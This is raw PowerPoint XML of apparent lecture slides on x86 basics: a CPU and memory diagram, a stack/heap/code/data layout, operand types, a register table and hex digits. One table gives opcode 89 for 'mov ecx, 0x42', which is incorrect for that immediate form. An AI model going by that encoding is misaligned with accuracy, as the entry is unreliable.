                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>I/O Devices</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5732659" y="3415644"/>
              <a:ext cx="988925" cy="923330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Main</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Memory</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>RAM</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Left-Right Arrow 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5004048" y="4394273"/>
              <a:ext cx="728611" cy="3308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3132774" y="2420888"/>
              <a:ext cx="574196" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                <a:t>CPU</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Left-Right Arrow 17"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2750794" y="3749587"/>
              <a:ext cx="450541" cy="31342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Left-Right Arrow 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="2594901" y="5123372"/>
              <a:ext cx="720080" cy="355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Left-Right Arrow 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3401379" y="4464789"/>
              <a:ext cx="450541" cy="31342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Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020272" y="2919984"/>
            <a:ext cx="1944216" cy="3677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164288" y="3429000"/>
            <a:ext cx="1656184"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7236628" y="2919984"/>
            <a:ext cx="1511504" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Main memory</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7665815" y="3595304"/>
            <a:ext cx="677173" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7653793" y="4310506"/>
            <a:ext cx="676788" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7666672" y="5157192"/>
            <a:ext cx="667170" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693748" y="5998326"/>
            <a:ext cx="620554" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="Straight Connector 31"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7164288" y="4083279"/>
            <a:ext cx="1656184" cy="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206203" y="4814840"/>
            <a:ext cx="1656184" cy="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204243" y="5858956"/>
            <a:ext cx="1656184" cy="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07604" y="3399752"/>
            <a:ext cx="612668" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>LMA</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="TextBox 39"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6407604" y="6045497"/>
            <a:ext cx="659155" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>MA</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19950905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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Opcodes and Endianness</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>Operands</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Immediate: 0x42</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Register: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Memory address: [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>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1899727432"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1619672" y="1700808"/>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smtClean="0"/>
                        <a:t>Mnemonic</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>Dest</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>.. Operand</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Source operand</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>0x42</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB"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3079190"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1619672" y="3212976"/>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smtClean="0"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
                        <a:t>Mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>0x42</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Opcodes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>89</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>42 00 00 00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30596241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smtClean="0"/>
              <a:t>Registers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: a small amount of data storage in CPU</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03392291"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1547664" y="2276872"/>
          <a:ext cx="6316790" cy="3606800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1744790"/>
                <a:gridCol w="1524000"/>
                <a:gridCol w="1524000"/>
                <a:gridCol w="1524000"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>General register</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Segment register</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Status register</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> (flag)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>Instruction pointer</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>EAX (AX,AH, AL)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>CS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>EFLAGS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>EIP</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>EBX (BX, BH, BL)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>SS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ECX (CX, CH, CL)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>DS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EDX (DX, DH, DL)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>ES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EBP (BP)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>FS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ESP (SP)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
                        <a:t>GS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ESI (SI)</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EDI (DI)</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9525630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a:t>Registers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844605" y="3356992"/>
            <a:ext cx="3039763"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X86 Disassembly</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="1772816"/>
            <a:ext cx="612068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907704" y="1845694"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1010</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2634846" y="1841262"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360163" y="1826748"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4103782" y="1846565"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1100</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4842486" y="1856994"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>8</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567803" y="1856994"/>
            <a:ext cx="725317" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>0001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
